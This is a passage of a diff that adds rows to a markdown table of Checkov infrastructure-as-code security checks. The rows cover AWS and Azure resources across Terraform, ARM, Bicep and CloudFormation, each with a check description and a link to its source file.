+| 1502 | CKV2_AWS_51              | resource                         | aws_apigatewayv2_stage                                                                           | Ensure AWS API Gateway endpoints uses client certificate authentication                                                                                                                                  | Terraform               | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml)                 |
+| 1503 | CKV2_AWS_52              | resource                         | aws_elasticsearch_domain                                                                         | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled                                                                                                                               | Terraform               | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml)                                             |
+| 1504 | CKV2_AWS_52              | resource                         | aws_opensearch_domain                                                                            | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled                                                                                                                               | Terraform               | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml)                                             |
+| 1505 | CKV2_AWS_53              | resource                         | aws_api_gateway_method                                                                           | Ensure AWS API gateway request is validated                                                                                                                                                              | Terraform               | [APIGatewayRequestParameterValidationEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayRequestParameterValidationEnabled.yaml)                                 |
+| 1506 | CKV2_AWS_54              | resource                         | aws_cloudfront_distribution                                                                      | Ensure AWS CloudFront distribution is using secure SSL protocols for HTTPS communication                                                                                                                 | Terraform               | [CloudFrontUsesSecureProtocolsForHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontUsesSecureProtocolsForHTTPS.yaml)                                             |
+| 1507 | CKV2_AWS_55              | resource                         | aws_emr_cluster                                                                                  | Ensure AWS EMR cluster is configured with security configuration                                                                                                                                         | Terraform               | [EMRClusterHasSecurityConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EMRClusterHasSecurityConfiguration.yaml)                                                   |
+| 1508 | CKV2_AWS_56              | resource                         | aws_iam_group_policy_attachment                                                                  | Ensure AWS Managed IAMFullAccess IAM policy is not used.                                                                                                                                                 | Terraform               | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml)                                                             |
+| 1509 | CKV2_AWS_56              | resource                         | aws_iam_policy_attachment                                                                        | Ensure AWS Managed IAMFullAccess IAM policy is not used.                                                                                                                                                 | Terraform               | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml)                                                             |
+| 1510 | CKV2_AWS_56              | resource                         | aws_iam_role                                                                                     | Ensure AWS Managed IAMFullAccess IAM policy is not used.                                                                                                                                                 | Terraform               | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml)                                                             |
+| 1511 | CKV2_AWS_56              | resource                         | aws_iam_role_policy_attachment                                                                   | Ensure AWS Managed IAMFullAccess IAM policy is not used.                                                                                                                                                 | Terraform               | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml)                                                             |
+| 1512 | CKV2_AWS_56              | resource                         | aws_iam_user_policy_attachment                                                                   | Ensure AWS Managed IAMFullAccess IAM policy is not used.                                                                                                                                                 | Terraform               | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml)                                                             |
+| 1513 | CKV2_AWS_56              | resource                         | aws_ssoadmin_managed_policy_attachment                                                           | Ensure AWS Managed IAMFullAccess IAM policy is not used.                                                                                                                                                 | Terraform               | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml)                                                             |
+| 1514 | CKV2_AWS_56              | resource                         | data.aws_iam_policy                                                                              | Ensure AWS Managed IAMFullAccess IAM policy is not used.                                                                                                                                                 | Terraform               | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml)                                                             |
+| 1515 | CKV2_AWS_57              | resource                         | aws_secretsmanager_secret                                                                        | Ensure Secrets Manager secrets should have automatic rotation enabled                                                                                                                                    | Terraform               | [SecretsAreRotated.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SecretsAreRotated.yaml)                                                                                     |
+| 1516 | CKV2_AWS_58              | resource                         | aws_neptune_cluster                                                                              | Ensure AWS Neptune cluster deletion protection is enabled                                                                                                                                                | Terraform               | [NeptuneDeletionProtectionEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NeptuneDeletionProtectionEnabled.yaml)                                                       |
+| 1517 | CKV2_AWS_59              | resource                         | aws_elasticsearch_domain                                                                         | Ensure ElasticSearch/OpenSearch has dedicated master node enabled                                                                                                                                        | Terraform               | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml)                                                 |
+| 1518 | CKV2_AWS_59              | resource                         | aws_opensearch_domain                                                                            | Ensure ElasticSearch/OpenSearch has dedicated master node enabled                                                                                                                                        | Terraform               | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml)                                                 |
+| 1519 | CKV2_AWS_60              | resource                         | aws_db_instance                                                                                  | Ensure RDS instance with copy tags to snapshots is enabled                                                                                                                                               | Terraform               | [RDSEnableCopyTagsToSnapshot.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSEnableCopyTagsToSnapshot.yaml)                                                                 |
+| 1520 | CKV2_AWS_61              | resource                         | aws_s3_bucket                                                                                    | Ensure that an S3 bucket has a lifecycle configuration                                                                                                                                                   | Terraform               | [S3BucketLifecycle.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLifecycle.yaml)                                                                                     |
+| 1521 | CKV2_AWS_62              | resource                         | aws_s3_bucket                                                                                    | Ensure S3 buckets should have event notifications enabled                                                                                                                                                | Terraform               | [S3BucketEventNotifications.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEventNotifications.yaml)                                                                   |
+| 1522 | CKV2_AWS_63              | resource                         | aws_networkfirewall_firewall                                                                     | Ensure Network firewall has logging configuration defined                                                                                                                                                | Terraform               | [NetworkFirewallHasLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NetworkFirewallHasLogging.yaml)                                                                     |
+| 1523 | CKV2_AWS_64              | resource                         | aws_kms_key                                                                                      | Ensure KMS key Policy is defined                                                                                                                                                                         | Terraform               | [KmsKeyPolicyIsDefined.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/KmsKeyPolicyIsDefined.yaml)                                                                             |
+| 1524 | CKV2_AWS_65              | resource                         | aws_s3_bucket_ownership_controls                                                                 | Ensure access control lists for S3 buckets are disabled                                                                                                                                                  | Terraform               | [AWSdisableS3ACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSdisableS3ACL.yaml)                                                                                         |
+| 1525 | CKV2_AWS_66              | resource                         | aws_mwaa_environment                                                                             | Ensure MWAA environment is not publicly accessible                                                                                                                                                       | Terraform               | [AWS_private_MWAA_environment.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWS_private_MWAA_environment.yaml)                                                               |
+| 1526 | CKV2_AWS_68              | resource                         | AWS::IAM::Role                                                                                   | Ensure SageMaker notebook instance IAM policy is not overly permissive                                                                                                                                   | Cloudformation          | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml)                          |
+| 1527 | CKV2_AWS_68              | resource                         | AWS::SageMaker::NotebookInstance                                                                 | Ensure SageMaker notebook instance IAM policy is not overly permissive                                                                                                                                   | Cloudformation          | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml)                          |
+| 1528 | CKV2_AWS_68              | resource                         | aws_iam_role                                                                                     | Ensure SageMaker notebook instance IAM policy is not overly permissive                                                                                                                                   | Terraform               | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml)                           |
+| 1529 | CKV2_AWS_68              | resource                         | aws_sagemaker_notebook_instance                                                                  | Ensure SageMaker notebook instance IAM policy is not overly permissive                                                                                                                                   | Terraform               | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml)                           |
+| 1530 | CKV_AZURE_1              | resource                         | Microsoft.Compute/virtualMachines                                                                | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead)                                                                                                                             | arm                     | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py)                                                                                               |
+| 1531 | CKV_AZURE_1              | resource                         | Microsoft.Compute/virtualMachines                                                                | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead)                                                                                                                             | Bicep                   | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py)                                                                                               |
+| 1532 | CKV_AZURE_1              | resource                         | azurerm_linux_virtual_machine                                                                    | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead)                                                                                                                             | Terraform               | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py)                                                                                   |
+| 1533 | CKV_AZURE_1              | resource                         | azurerm_virtual_machine                                                                          | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead)                                                                                                                             | Terraform               | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py)                                                                                   |
+| 1534 | CKV_AZURE_2              | resource                         | Microsoft.Compute/disks                                                                          | Ensure Azure managed disk have encryption enabled                                                                                                                                                        | arm                     | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py)                                                                                     |
+| 1535 | CKV_AZURE_2              | resource                         | Microsoft.Compute/disks                                                                          | Ensure Azure managed disk have encryption enabled                                                                                                                                                        | Bicep                   | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py)                                                                                     |
+| 1536 | CKV_AZURE_2              | resource                         | azurerm_managed_disk                                                                             | Ensure Azure managed disk has encryption enabled                                                                                                                                                         | Terraform               | [AzureManagedDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryption.py)                                                                         |
+| 1537 | CKV_AZURE_3              | resource                         | Microsoft.Storage/storageAccounts                                                                | Ensure that 'supportsHttpsTrafficOnly' is set to 'true'                                                                                                                                                  | arm                     | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountsTransportEncryption.py)                                                                     |
+| 1538 | CKV_AZURE_3              | resource                         | Microsoft.Storage/storageAccounts                                                                | Ensure that 'supportsHttpsTrafficOnly' is set to 'true'                                                                                                                                                  | Bicep                   | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountsTransportEncryption.py)                                                             |
+| 1539 | CKV_AZURE_3              | resource                         | azurerm_storage_account                                                                          | Ensure that 'enable_https_traffic_only' is enabled                                                                                                                                                       | Terraform               | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsTransportEncryption.py)                                                         |
+| 1540 | CKV_AZURE_4              | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure AKS logging to Azure Monitoring is Configured                                                                                                                                                     | arm                     | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py)                                                                                                       |
+| 1541 | CKV_AZURE_4              | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure AKS logging to Azure Monitoring is Configured                                                                                                                                                     | Bicep                   | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py)                                                                                                       |
+| 1542 | CKV_AZURE_4              | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure AKS logging to Azure Monitoring is Configured                                                                                                                                                     | Terraform               | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLoggingEnabled.py)                                                                                           |
+| 1543 | CKV_AZURE_5              | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure RBAC is enabled on AKS clusters                                                                                                                                                                   | arm                     | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py)                                                                                                             |
+| 1544 | CKV_AZURE_5              | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure RBAC is enabled on AKS clusters                                                                                                                                                                   | Bicep                   | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py)                                                                                                             |
+| 1545 | CKV_AZURE_5              | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure RBAC is enabled on AKS clusters                                                                                                                                                                   | Terraform               | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSRbacEnabled.py)                                                                                                 |
+| 1546 | CKV_AZURE_6              | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure AKS has an API Server Authorized IP Ranges enabled                                                                                                                                                | arm                     | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py)                                                                             |
+| 1547 | CKV_AZURE_6              | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure AKS has an API Server Authorized IP Ranges enabled                                                                                                                                                | Bicep                   | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py)                                                                             |
+| 1548 | CKV_AZURE_6              | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure AKS has an API Server Authorized IP Ranges enabled                                                                                                                                                | Terraform               | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSApiServerAuthorizedIpRanges.py)                                                                 |
+| 1549 | CKV_AZURE_7              | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure AKS cluster has Network Policy configured                                                                                                                                                         | arm                     | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py)                                                                                                         |
+| 1550 | CKV_AZURE_7              | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure AKS cluster has Network Policy configured                                                                                                                                                         | Bicep                   | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py)                                                                                                         |
+| 1551 | CKV_AZURE_7              | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure AKS cluster has Network Policy configured                                                                                                                                                         | Terraform               | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNetworkPolicy.py)                                                                                             |
+| 1552 | CKV_AZURE_8              | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure Kubernetes Dashboard is disabled                                                                                                                                                                  | arm                     | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py)                                                                                                 |
+| 1553 | CKV_AZURE_8              | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure Kubernetes Dashboard is disabled                                                                                                                                                                  | Bicep                   | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py)                                                                                                 |
+| 1554 | CKV_AZURE_8              | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure Kubernetes Dashboard is disabled                                                                                                                                                                  | Terraform               | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSDashboardDisabled.py)                                                                                     |
+| 1555 | CKV_AZURE_9              | resource                         | Microsoft.Network/networkSecurityGroups                                                          | Ensure that RDP access is restricted from the internet                                                                                                                                                   | arm                     | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py)                                                                                     |
+| 1556 | CKV_AZURE_9              | resource                         | Microsoft.Network/networkSecurityGroups                                                          | Ensure that RDP access is restricted from the internet                                                                                                                                                   | Bicep                   | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py)                                                                                     |
+| 1557 | CKV_AZURE_9              | resource                         | Microsoft.Network/networkSecurityGroups/securityRules                                            | Ensure that RDP access is restricted from the internet                                                                                                                                                   | arm                     | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py)                                                                                     |
+| 1558 | CKV_AZURE_9              | resource                         | Microsoft.Network/networkSecurityGroups/securityRules                                            | Ensure that RDP access is restricted from the internet                                                                                                                                                   | Bicep                   | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py)                                                                                     |
+| 1559 | CKV_AZURE_9              | resource                         | azurerm_network_security_group                                                                   | Ensure that RDP access is restricted from the internet                                                                                                                                                   | Terraform               | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py)                                                                         |
+| 1560 | CKV_AZURE_9              | resource                         | azurerm_network_security_rule                                                                    | Ensure that RDP access is restricted from the internet                                                                                                                                                   | Terraform               | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py)                                                                         |
+| 1561 | CKV_AZURE_10             | resource                         | Microsoft.Network/networkSecurityGroups                                                          | Ensure that SSH access is restricted from the internet                                                                                                                                                   | arm                     | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py)                                                                                     |
+| 1562 | CKV_AZURE_10             | resource                         | Microsoft.Network/networkSecurityGroups                                                          | Ensure that SSH access is restricted from the internet                                                                                                                                                   | Bicep                   | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py)                                                                                     |
+| 1563 | CKV_AZURE_10             | resource                         | Microsoft.Network/networkSecurityGroups/securityRules                                            | Ensure that SSH access is restricted from the internet                                                                                                                                                   | arm                     | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py)                                                                                     |
+| 1564 | CKV_AZURE_10             | resource                         | Microsoft.Network/networkSecurityGroups/securityRules                                            | Ensure that SSH access is restricted from the internet                                                                                                                                                   | Bicep                   | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py)                                                                                     |
+| 1565 | CKV_AZURE_10             | resource                         | azurerm_network_security_group                                                                   | Ensure that SSH access is restricted from the internet                                                                                                                                                   | Terraform               | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py)                                                                         |
+| 1566 | CKV_AZURE_10             | resource                         | azurerm_network_security_rule                                                                    | Ensure that SSH access is restricted from the internet                                                                                                                                                   | Terraform               | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py)                                                                         |
+| 1567 | CKV_AZURE_11             | resource                         | Microsoft.Sql/servers                                                                            | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP)                                                                                                                                            | arm                     | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py)                                                                                           |
+| 1568 | CKV_AZURE_11             | resource                         | Microsoft.Sql/servers                                                                            | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP)                                                                                                                                            | Bicep                   | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py)                                                                                           |
+| 1569 | CKV_AZURE_11             | resource                         | azurerm_mariadb_firewall_rule                                                                    | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP)                                                                                                                                            | Terraform               | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py)                                                                               |
+| 1570 | CKV_AZURE_11             | resource                         | azurerm_mysql_firewall_rule                                                                      | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP)                                                                                                                                            | Terraform               | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py)                                                                               |
+| 1571 | CKV_AZURE_11             | resource                         | azurerm_postgresql_firewall_rule                                                                 | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP)                                                                                                                                            | Terraform               | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py)                                                                               |
+| 1572 | CKV_AZURE_11             | resource                         | azurerm_sql_firewall_rule                                                                        | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP)                                                                                                                                            | Terraform               | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py)                                                                               |
+| 1573 | CKV_AZURE_12             | resource                         | Microsoft.Network/networkWatchers/FlowLogs                                                       | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                                                                                                                   | arm                     | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                                                                   |
+| 1574 | CKV_AZURE_12             | resource                         | Microsoft.Network/networkWatchers/FlowLogs                                                       | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                                                                                                                   | Bicep                   | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                                                                   |
+| 1575 | CKV_AZURE_12             | resource                         | Microsoft.Network/networkWatchers/FlowLogs/                                                      | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                                                                                                                   | arm                     | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                                                                   |
+| 1576 | CKV_AZURE_12             | resource                         | Microsoft.Network/networkWatchers/FlowLogs/                                                      | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                                                                                                                   | Bicep                   | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                                                                   |
+| 1577 | CKV_AZURE_12             | resource                         | Microsoft.Network/networkWatchers/flowLogs                                                       | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                                                                                                                   | arm                     | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                                                                   |
+| 1578 | CKV_AZURE_12             | resource                         | Microsoft.Network/networkWatchers/flowLogs                                                       | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                                                                                                                   | Bicep                   | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                                                                   |
+| 1579 | CKV_AZURE_12             | resource                         | Microsoft.Network/networkWatchers/flowLogs/                                                      | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                                                                                                                   | arm                     | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                                                                   |
+| 1580 | CKV_AZURE_12             | resource                         | Microsoft.Network/networkWatchers/flowLogs/                                                      | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                                                                                                                   | Bicep                   | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                                                                   |
+| 1581 | CKV_AZURE_12             | resource                         | azurerm_network_watcher_flow_log                                                                 | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                                                                                                                   | Terraform               | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkWatcherFlowLogPeriod.py)                                                                       |
+| 1582 | CKV_AZURE_13             | resource                         | Microsoft.Web/sites/config                                                                       | Ensure App Service Authentication is set on Azure App Service                                                                                                                                            | arm                     | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py)                                                                                         |
+| 1583 | CKV_AZURE_13             | resource                         | Microsoft.Web/sites/config                                                                       | Ensure App Service Authentication is set on Azure App Service                                                                                                                                            | Bicep                   | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py)                                                                                         |
+| 1584 | CKV_AZURE_13             | resource                         | azurerm_app_service                                                                              | Ensure App Service Authentication is set on Azure App Service                                                                                                                                            | Terraform               | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py)                                                                             |
+| 1585 | CKV_AZURE_13             | resource                         | azurerm_linux_web_app                                                                            | Ensure App Service Authentication is set on Azure App Service                                                                                                                                            | Terraform               | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py)                                                                             |
+| 1586 | CKV_AZURE_13             | resource                         | azurerm_windows_web_app                                                                          | Ensure App Service Authentication is set on Azure App Service                                                                                                                                            | Terraform               | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py)                                                                             |
+| 1587 | CKV_AZURE_13             | resource                         | config                                                                                           | Ensure App Service Authentication is set on Azure App Service                                                                                                                                            | arm                     | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py)                                                                                         |
+| 1588 | CKV_AZURE_13             | resource                         | config                                                                                           | Ensure App Service Authentication is set on Azure App Service                                                                                                                                            | Bicep                   | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py)                                                                                         |
+| 1589 | CKV_AZURE_14             | resource                         | Microsoft.Web/sites                                                                              | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service                                                                                                                                  | arm                     | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py)                                                                                                   |
